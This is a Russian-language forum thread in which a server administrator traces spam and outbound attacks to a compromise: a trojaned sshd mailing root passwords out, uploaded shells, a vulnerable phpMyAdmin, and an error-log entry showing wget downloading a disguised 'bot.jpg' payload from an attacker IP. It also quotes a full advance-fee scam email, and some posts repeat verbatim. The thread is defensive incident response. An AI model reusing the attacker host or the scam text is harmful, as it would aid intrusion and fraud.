Уже как 5 дней с датацентра приходят абузы, что с моего сервака рассылаются спам сообщения. На сарвере находятся около 13 сайтов. Я сперва грешил на, то что котото залил php скрипт который делает рассылку. Пропатчил php с mail header patch, что бы посмотреть в заголовке айпи отправителя и скрипт через который шлются сообщения. Но фиг там. В абузе написано что через Microsoft outlook ведутся рассылки. Уже сменил все пароли на почтовиках, а рассылка каким то боком всеравно идет. Буду очень признателен, если ктото поможет с решением проблемы.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Одалели спам сообщения
- Автор темы lenovo
- Дата начала
Проблема возможно связана с работой sendmail или exim. По крайней мере у меня такие проблемы были. Вместо оригинального сендмейла взломщик подсовывает левый софт (и правит символические ссылки в /etc/init.d/ а также кронтабы и авторан. Процессы видня ис под рута в top необходимо посмотреть пути к запущенным файлам, проверить все символические ссылки туда ли они ведут. В итоге нужно запустить серверный руткит чекер и проверить дырки.
Теперь можно сменить пароль.
на всякий случай сделай who и посмотри не висит ли левая сессия рута.
Что за антируткит можно у ареса не помню как называется.
Теперь можно сменить пароль.
на всякий случай сделай who и посмотри не висит ли левая сессия рута.
Что за антируткит можно у ареса не помню как называется.
- Автор темы
- Добавить закладку
- #3
Спасибо большое за совет. Chrootkit показал что все чисто. В топе висят все процесы которые я знаю. Левые руты не виcят. Посмотрел через who. Кронтабы стоят только те что мне надо. В роде все что можно было, проверил. Еще есть идеи?
Добавлено в [time]1289487181[/time]
А вот письмо с абузой:
Return-path: <ambassadorrobinrenee@yahoo.co.jp>
Received: from [ip моего сервера] (helo=домен моего сервера) by
bastion06.mail.zen.net.uk with esmtp (Exim 4.69) (envelope-from
<ambassadorrobinrenee@yahoo.co.jp>) id 1PGGha-0003Ur-U2 for <removed>; Wed,
10 Nov 2010 19:51:28 +0000
Received: from User (ml82.128.17.5.multilinks.com [82.128.17.5]) by
домен моего сервера (Postfix) with ESMTP id 06FEA4528B8A; Wed, 10 Nov 2010 15:18:51
+0100 (CET)
Reply-To: <ambassador-robin.renee@w.cn>
From: "ROBIN RENEE SANDERS"<ambassadorrobinrenee@yahoo.co.jp>
Subject: AMBASSADOR ROBIN RENEE SANDERS
Date: Wed, 10 Nov 2010 06:14:59 -0800
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20101110141852.06FEA4528B8A@домен моего сервера>
To: <removed>
X-ZenAWL-Match: false
X-Zen-Test-Spam-Score: 87
X-Zen-Test-Spam-Bar: (++++++++)
X-Originating-Bastion06-IP: [IP моего сервера]
X-Envelope-From: ambassadorrobinrenee@yahoo.co.jp
US AMBASSADOR TO NIGERIA
11 GARIK ROAD ABUJA
ABUJA, NIGERIA
ATTN:
I SHALL BE COMING TO YOUR COUNTRY FOR AN OFFICIAL MEETING ON FRIDAY AND I WILL BE BRINGING YOUR FUNDS OF $3.5M ALONG WITH ME BUT THIS TIME I WILL NOT GO
THROUGH CUSTOMS BECAUSE AS AN AMBASSADOR TO NIGERIA , I AM A US GOVERNMENT AGENT AND I HAVE THE VETO POWER TO GO THROUGH CUSTOMS. AS SOON AS I AM THROUGH
WITH THE MEETING I SHALL THEN PROCEED TO YOUR ADDRESS. (SEND YOUR CELL PHONE NUMBER
AND THE ADDRESS WHERE YOU WANT ME TO BRING THE PACKAGE).
YOU HAVE REALLY PAID SO MUCH IN THIS DELIVERY THAT MAKES ME WONDER. YOU ARE A VERY LUCKY PERSON BECAUSE I SHALL BE BRINGING IT MYSELF AND THERE IS NOTHING
ANYONE CAN DO ABOUT IT.
Добавлено в [time]1289487181[/time]
А вот письмо с абузой:
Return-path: <ambassadorrobinrenee@yahoo.co.jp>
Received: from [ip моего сервера] (helo=домен моего сервера) by
bastion06.mail.zen.net.uk with esmtp (Exim 4.69) (envelope-from
<ambassadorrobinrenee@yahoo.co.jp>) id 1PGGha-0003Ur-U2 for <removed>; Wed,
10 Nov 2010 19:51:28 +0000
Received: from User (ml82.128.17.5.multilinks.com [82.128.17.5]) by
домен моего сервера (Postfix) with ESMTP id 06FEA4528B8A; Wed, 10 Nov 2010 15:18:51
+0100 (CET)
Reply-To: <ambassador-robin.renee@w.cn>
From: "ROBIN RENEE SANDERS"<ambassadorrobinrenee@yahoo.co.jp>
Subject: AMBASSADOR ROBIN RENEE SANDERS
Date: Wed, 10 Nov 2010 06:14:59 -0800
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20101110141852.06FEA4528B8A@домен моего сервера>
To: <removed>
X-ZenAWL-Match: false
X-Zen-Test-Spam-Score: 87
X-Zen-Test-Spam-Bar: (++++++++)
X-Originating-Bastion06-IP: [IP моего сервера]
X-Envelope-From: ambassadorrobinrenee@yahoo.co.jp
US AMBASSADOR TO NIGERIA
11 GARIK ROAD ABUJA
ABUJA, NIGERIA
ATTN:
I SHALL BE COMING TO YOUR COUNTRY FOR AN OFFICIAL MEETING ON FRIDAY AND I WILL BE BRINGING YOUR FUNDS OF $3.5M ALONG WITH ME BUT THIS TIME I WILL NOT GO
THROUGH CUSTOMS BECAUSE AS AN AMBASSADOR TO NIGERIA , I AM A US GOVERNMENT AGENT AND I HAVE THE VETO POWER TO GO THROUGH CUSTOMS. AS SOON AS I AM THROUGH
WITH THE MEETING I SHALL THEN PROCEED TO YOUR ADDRESS. (SEND YOUR CELL PHONE NUMBER
AND THE ADDRESS WHERE YOU WANT ME TO BRING THE PACKAGE).
YOU HAVE REALLY PAID SO MUCH IN THIS DELIVERY THAT MAKES ME WONDER. YOU ARE A VERY LUCKY PERSON BECAUSE I SHALL BE BRINGING IT MYSELF AND THERE IS NOTHING
ANYONE CAN DO ABOUT IT.
от хорошего руткита не спасет ни chkrootkit ни rkhunter. Переставляй ОС или переезжай на другой сервер)
это запросто могут быть письма с обратным адресом его сервака. Уточни жалоба приходит на домен или Ip?
Я уже говорил что надо просматривать пути до файлов, у меня была подобная проблема, причем вдс спамил так, что загибался от этого потока. ПРосто нашел все левые файлы и вычистил нахер. Ради эксперимента вырубай службы по очереди, например прибей экзим.
Чушь.
Не бывает такого софта.
Я вот просто нахуй не смирюсь с таким фактом. Чисто принципиально я вообще никак не смирюсь, что я внезапно не могу разобраться с какой то дрянью.
Просижу 3 дня без сна, но найду.
Доо. Ну конечно, успехов
посмотреть кто пользует sendmail
это явно скрипт на сервере подмена исполняемово фала снедмаил - сомневаюсь имхо
можно еше попробывать поискать файлы может найдете скрипт
find / -name "mail"
хотя он может называтся a.out
смотрите логи last
или логи фтп какие фалы заливали
неудевлючь если wtmp пуст =) дату редактирования посмотите хотя хороший клинер все сделает красиво =)
это явно скрипт на сервере подмена исполняемово фала снедмаил - сомневаюсь имхо
можно еше попробывать поискать файлы может найдете скрипт
find / -name "mail"
хотя он может называтся a.out
смотрите логи last
или логи фтп какие фалы заливали
неудевлючь если wtmp пуст =) дату редактирования посмотите хотя хороший клинер все сделает красиво =)
Если технически понимать как работает вообще сервер (ось в частности и тот же почтовый сервер) и при этом не используются резидентные механизмы сокрытия, то вычистить можно все, рано или поздно, даже с такими скудными знаниями как у меня
- Автор темы
- Добавить закладку
- #11
Жесть. Нашол в /var/spool/postfix/maildrop файлы в писем в которых были записаны все расшифрованые пароли рута и другиз пользователей. И все эти пароли шли на одно мыло. Я сделал поиск мыла по этому серверу, и как оказалось я нашол его в /usr/sbin/sshd , /usr/bin/ssh
Проще говоря, все пароли были в расшифрованом виде пересланы на левое мыло. То есть получается, что sshd был тупо заменят на левый, который слал пароли на мыло. Так что не удивительно. что с сервера шол такой спам. В общем попробую сделать полный reinstall тазика, так как вряд ли я найду сервис который отсылает спам...
Всем большое спасибо. Всетаки проблема была в подмене оригинальных файлов сервисов.
Проще говоря, все пароли были в расшифрованом виде пересланы на левое мыло. То есть получается, что sshd был тупо заменят на левый, который слал пароли на мыло. Так что не удивительно. что с сервера шол такой спам. В общем попробую сделать полный reinstall тазика, так как вряд ли я найду сервис который отсылает спам...
Всем большое спасибо. Всетаки проблема была в подмене оригинальных файлов сервисов.
Жаль жаль.. столько трудов положить и бросить
Ведь есть же прогресс, ИМХО лучший способ разобраться в системе - это ее починить!
TrueUser, это не всегда целесообразно. Дни простоя сервера - это убытки.
Это уж извните.. как руки настроены. ДНЯМИ колупаться в серве нечего, или за несколько часов победил или сдаемсю
- Автор темы
- Добавить закладку
- #15
Товарищи, ну нет покоя. Короче слил файло с базами на винду, проверил их на авирой на шелы. Нашол 3 шела и удалил их. Переустановил ось с нуля, закинул чистое файло обратно на тазик. 2 дня был полет нормальны. Сегодня приходит письмо с датацентра что с моего сервака идет внешняя атака.
Direction OUT
Internal 213.239.192.178
Threshold Packets 30.000 packets/s
Sum 16.764.000 packets/300s (55.880 packets/s), 4 flows/300s (0 flows/s), 0,453 GByte/300s (12 MBit/s)
External 113.190.47.6, 16.764.000 packets/300s (55.880 packets/s), 4 flows/300s (0 flows/s), 0,453 GByte/300s (12 MBit/s)
В роде всю срань вычистил, а пакости еще есть. Не подскажете, где можно достать какойто срипт, который хорошо проверяет на шелы? Пробыл этот http://forum.xakepok.org/showthread.php?t=483 , но он выводит все подряд. То есть что нужно и не нужно.
На данный момент тупо ферволом перекрыл icmp пакеты со стороны тазика и в ДЦ сказали что атаки больше нет с сервера. Но я то понимаю, что я обошел проблему, а не решил ее :huh1:
Direction OUT
Internal 213.239.192.178
Threshold Packets 30.000 packets/s
Sum 16.764.000 packets/300s (55.880 packets/s), 4 flows/300s (0 flows/s), 0,453 GByte/300s (12 MBit/s)
External 113.190.47.6, 16.764.000 packets/300s (55.880 packets/s), 4 flows/300s (0 flows/s), 0,453 GByte/300s (12 MBit/s)
В роде всю срань вычистил, а пакости еще есть. Не подскажете, где можно достать какойто срипт, который хорошо проверяет на шелы? Пробыл этот http://forum.xakepok.org/showthread.php?t=483 , но он выводит все подряд. То есть что нужно и не нужно.
На данный момент тупо ферволом перекрыл icmp пакеты со стороны тазика и в ДЦ сказали что атаки больше нет с сервера. Но я то понимаю, что я обошел проблему, а не решил ее :huh1:
Попробуй пошариться по логам в конце концов, если у тебя ресурс обычный (ну с типовыми урлами) то можно будет выловить через access.log обращения на шелл, при этом в error.log интерпретатор PHP должен вываливать ахтунги что сокет не смог открыться.
- Автор темы
- Добавить закладку
- #17
Нашел в error.log
вот такую строчку
[Wed Nov 17 04:37:15 2010] [notice] Apache/2.2.3 (CentOS) configured -- resuming normal operations
--2010-11-17 10:04:48-- http://208.75.230.43/zburchi/bot.jpg
Connecting to 208.75.230.43:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28576 (28K) [image/jpeg]
Saving to: `bot.jpg'
0K .......... .......... ....... 100% 83.2K=0.3s
2010-11-17 10:04:49 (83.2 KB/s) - `bot.jpg' saved [28576/28576]
вот такую строчку
[Wed Nov 17 04:37:15 2010] [notice] Apache/2.2.3 (CentOS) configured -- resuming normal operations
--2010-11-17 10:04:48-- http://208.75.230.43/zburchi/bot.jpg
Connecting to 208.75.230.43:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28576 (28K) [image/jpeg]
Saving to: `bot.jpg'
0K .......... .......... ....... 100% 83.2K=0.3s
2010-11-17 10:04:49 (83.2 KB/s) - `bot.jpg' saved [28576/28576]
Это на самом деле не картинка а скрипт.
Смотреть содержимое
Ты его удали конечно же, но это не поможет тебе как я предполагаю. Ну на дня три еще хватит а потом начнется заново. Ищи баги в своем софте. Тебя походу постоянно ломают и подливают тебе говнеца.
А обсуждение аналогичного случая вы найдете здесь
Смотреть содержимое
Ты его удали конечно же, но это не поможет тебе как я предполагаю. Ну на дня три еще хватит а потом начнется заново. Ищи баги в своем софте. Тебя походу постоянно ломают и подливают тебе говнеца.
А обсуждение аналогичного случая вы найдете здесь
Опять же проблема видимо не в скриптах, если человек получает рута, значит что то прохалтурено с настройками прав и вообще серверов (вебсервера например или по сути там же пхп) надо обязательно обновиться после очередной чистки, позапрещать к ебени матери все и всем. Пускай ведро поработает порожняком. Почисти логи и садись за удочку. Рано или поздно твой друг придет к тебе тут то ты и выцепишь слабое место в скриптах. Ну если манит идея конечно (судя по тому что ты возишься с этим уже неделю, то видимо манит . Топик получается как руководство к действию для других жертв кибер насилия - между прочим очень полезный.
Например не исключено что апач воркает от имени рута :blink: , для корня в настройках cтоит Allow from all, вообще много слабых мест есть, даже в типовых настройках (те что по умолчанию стоят).
тут то ты и выцепишь слабое место в скриптах. Ну если манит идея конечно (судя по тому что ты возишься с этим уже неделю, то видимо манит . Топик получается как руководство к действию для других жертв кибер насилия - между прочим очень полезный.Например не исключено что апач воркает от имени рута :blink: , для корня в настройках cтоит Allow from all, вообще много слабых мест есть, даже в типовых настройках (те что по умолчанию стоят).
- Автор темы
- Добавить закладку
- #20
В error логах апача нашол жесткий подбор деррикторий phpmyadmin. Потом нашол в папке /tmp дерикторию с названием .m войдя в нее есть тоже кучу файлов. Мне эти файлы напомнили скрипты на с и перле для бэкконекта к доесеру. То есть досер походу посылает команды на сервак и сервак начинает нужный айпи. И как только я увидал эту папку, сразу позвонили с датацентра и сказали что идет out атака и утечка трафа. Я проверил весь сервак clamav но он толком нифига не показал. Потом пригляделся и увидал что phpmyadmin стоит версии 2.11.9 Это именно та версия которая дырявая. Я обновил ее до 2.11.11 и подчистил все логи. Вот теперь сижу и смотрю дальше куда бить будут. Проверил порты через nmap. В роде бы все чисто. Попробую поставить dcpdump и проанализировать через какой порт уходит трафик.
Добавлено в [time]1290433057[/time]
Кстати httpd работает от имени apache. Скорее всего не через это бомбят
Добавлено в [time]1290433057[/time]
Кстати httpd работает от имени apache. Скорее всего не через это бомбят